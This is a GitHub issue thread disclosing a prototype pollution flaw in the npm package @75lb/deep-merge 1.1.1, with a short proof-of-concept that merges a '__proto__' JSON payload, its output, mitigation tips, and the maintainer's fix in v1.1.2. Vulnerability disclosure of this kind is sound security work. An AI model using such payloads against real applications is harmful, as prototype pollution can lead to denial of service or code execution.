Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Prototype Pollution vulnerability affecting 75lb/deep-merge@1.1.1 #1

Closed
mestrtee opened this issue Mar 11, 2024 · 8 comments
Closed

Comments

@mestrtee
Copy link

Overview

Affected versions of this package are vulnerable to Prototype Pollution. An attacker can manipulate the prototype of an object, potentially leading to the alteration of behavior of all objects inheriting from the affected prototype by modify built-in Object.prototype through reachable special properties __proto__ and constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

PoC:

(async () => {
  const lib = await import('@75lb/deep-merge');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.default ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack: {}


After Attack: {"polluted":true}

How to prevent:

  • Freeze the root prototype using Object.freeze
  • Require schema validation of JSON input.
  • Avoid using unsafe recursive merge functions.
  • Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
  • As a best practice use Map instead of Object
@75lb
Copy link
Owner

75lb commented Mar 13, 2024

Beside pollution risk, is this issue causing you any operational problems?

@mestrtee
Copy link
Author

mestrtee commented Mar 15, 2024

The pollution is the first step to facilitate further attacks such as DOS, RCE, privilege escalation or any other OWASP 10 vulnerabilities depends on the implementation of the module. Please refer to the details in this article Snyk.io

@75lb
Copy link
Owner

75lb commented Mar 15, 2024

You answered a question I did not ask - I know what the vulnerability is, read my question again please. Is this issue currently causing you any specific operational issues? For example, is a security policy blocking you using the module, or an app which uses the module?

@mestrtee
Copy link
Author

Just to clarify, I'm not personally using this package. However, as this issue poses a potential risk to users, I've opened it to collaborate on addressing the vulnerability for the community's safety.

@75lb
Copy link
Owner

75lb commented Mar 16, 2024

yes, that's fine - I was just trying to assess the level of urgency..

@75lb
Copy link
Owner

75lb commented Mar 16, 2024

This project currently uses lodash to merge objects - this issue has already been reported upstream, will monitor it..

@hashboard-charlie
Copy link

hashboard-charlie commented Jul 31, 2024

This issue is now a error when running npm audit: https://gist.github.com/mestrtee/b20c3aee8bea16e1863933778da6e4cb

The issue is resolved in later versions of Lodash. https://github.com/lodash/lodash/blob/6a2cc1dfcf7634fea70d1bc5bd22db453df67b42/test/__proto__-property-bugs.spec.js#L26-L54

This package imports lodash.assignwith which is still vulnerable. Lodash no longer applies security updates to dot-suffix "micro packages" (https://lodash.com/per-method-packages, lodash/lodash#5894 (comment)).

This package should be updated to depend on lodash directly and import lodash/assignWith to ensure the minimum amount of code is bundled.

@75lb
Copy link
Owner

75lb commented Jul 31, 2024

I replaced lodash.assignwith with lodash/assignWith as suggested. Released in @75lb/deep-merge v1.1.2. I also fixed a similar issue in table-layout (used by command-line-usage).

Thanks for the report, let me know if there's anything else.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants